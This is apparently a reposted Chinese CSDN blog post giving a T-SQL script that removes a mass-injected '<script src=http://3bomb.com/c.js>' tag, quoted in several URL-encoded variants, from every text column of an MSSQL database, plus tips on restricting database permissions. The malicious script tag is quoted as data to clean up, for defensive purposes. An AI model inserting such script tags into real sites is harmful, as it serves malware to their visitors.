清除并防止C.JS注入MSSQL数据库
来源:互联网 发布:bigdecimal mysql 编辑:程序博客网 时间:2024/06/06 16:58
----------------- 清理数据库注入代码 ----------------
declare @delStr varchar(8000)
set @delStr='<script src=http://3%62omb.com/c.js></script>'
set @delStr='<script src=http://3bomb.%63%6Fm/c.js></script>'
set @delStr='<script src=http://3b%6F%6Db.com/c.js></script>'
set @delStr='<script src=http://%33bomb.com/c.js></script>'
set @delStr='<script src=http://3bomb.co%6D/c.js></script>'
set @delStr='<script src=http://3bom%62%2Ecom/c.js></script>'
set @delStr='<script src=http://3b%6Fmb.com/c.js></script>'
set @delStr='<script src=http://3bomb.c%6Fm/c.js></script>'
set @delStr='<script src=http://%33%62omb.com/c.js></script>'
set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype='U'
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,99,35) 为char,varchar,nchar,nvarchar,ntext,text类型
select name from syscolumns where xtype in (231,167,239,175,99,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(cast(['+@columnName+'] as varchar(8000)),'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''
--update tablename set fieldA=replace(cast(fieldA as varchar(8000)) ,'aa','bb')这样的语句。
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow>0
begin
print '表:'+@tableName+' ,列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
end
fetch next from cur1 into @columnName
end
close cur1
deallocate cur1
fetch next from cur into @tableName,@tbID
end
print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'
close cur
deallocate cur
set nocount off
----------------彻底杜绝SQL注入 ---------------
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
4、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/ZBzibing/archive/2009/05/08/4160903.aspx
- 清除并防止C.JS注入MSSQL数据库
- 清除并防止C.JS注入MSSQL数据库
- 清除数据库注入的js脚本代码
- MsSQL数据库日志清除
- 防范MSSQL数据库被挂马插入JS/sql注入
- 如何防范MSSQL数据库被挂马插入JS/SQL注入
- 数据库被注入 JS脚本 代码, 清除 方法
- 防止JS注入
- 防止JS脚本注入
- 防止js注入
- 防止js注入
- 防止JS注入
- PrepareStatement防止数据库注入
- SQL2005防止http://3b3.org/c.js注入
- 清除数据库mssql挂马方法
- MSSQL清除或收缩数据库日志
- MSSQL清除数据库中所有数据
- JAVA防止JS html 注入
- 老K开通博客了
- MOSS AJAX WebParts开发环境设置
- 微软企业库5.0学习笔记(五)引用企业库程序集及企业库的依赖
- 虚函数,重载,继承叠加产生的问题
- 塞班自带浏览器下载路径问题
- 清除并防止C.JS注入MSSQL数据库
- moss实现webpart包装userControls
- Oracle触发器
- Android深入浅出之Binder机制
- 继承
- C++各大有名库的介绍
- 自写字符串转换成整型函数
- tomcat改为windows服务
- Access / Oracle 中代替某字段null值的方法